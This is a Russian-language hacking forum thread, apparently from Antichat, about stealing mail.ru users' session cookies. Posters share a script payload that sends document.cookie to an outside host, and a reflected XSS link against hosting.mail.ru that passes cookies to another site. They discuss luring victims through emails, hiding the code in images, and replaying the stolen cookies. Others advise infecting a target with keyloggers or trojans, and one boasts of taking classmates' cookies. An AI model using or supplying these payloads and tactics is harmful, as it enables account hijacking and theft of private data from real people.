Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
Если просматривать письмо через Ж то можно украсть сессию. Только как нужно его просматривать я не знаю =(
а что толку от куков? они пароли не дают. у меня есть папка с универа (все куки забрал... ничего интересного, кроме адресов посещения, жж и блогов.
снач можешь прочитать вот тут потом можешь посмареть тут а уже потом ...или найти самому активную или пасссиввную...или зайти сюда или сюда и поискать пост с XSS на mail.ru
просто код вот: Code: <script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script> естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи! Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст. Разве что за $
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
Куда бы ты не заманивал пользователя, все равно должен быть xss на целевом сайте (в данном случае mail.ru)
Ага, ссылка на сни должна быть на mail.ru, например в письме, но почта фильтрует подобные ссылки.. я слышал можно закодировать ссылка со криптом както... это так? кто знает?
Вот именно что обычный код не пройдёт, система его забанит, вот и создал эту тему чтоб узнать рабочий код XSS под сниф для mail.ru естественно не за деньги.. за деньги можно всё купить.. а вот чтоб своими мозгам.. у меня покачто мозгов для этого нехватает видимо, поэтому и спрашиваю у людей. ))
А можно обычный код Code: <script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script> встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????
Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла... Да знаю - легко сказать. И тем немение троян работает! Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...
Хм.. хорошая идея но всё же если кто что может сказать полезного насчёт снифа - пишите. А насчёт кейлогера - дайте ссылку на хороший без лагов, а то их тоже не мало в сети.. А насчёт универа - у меня также вгруппе стадо придурков)
как не работают??? вот тебе пример... Code: http://hosting.mail.ru/selectLoginForConstructor.jsp?constructor="><script>navigate('http://site.ru/s.gif?'.concat(document.cookie))</script> ///при этом можно открыть гифку ..и вписать туда переадресацию.....чтобы палевно не было... Можно встроить в png .... в конец записать ...и в фоту на маил ру ..и то будет работать только в IE ...вот тут почитай
Конечно толку не будет если ты их не попробуешь в свой браузер вбить куки.А может случиться великое чудо ? %) и появиться надпись здраствуйте такой такой то ))
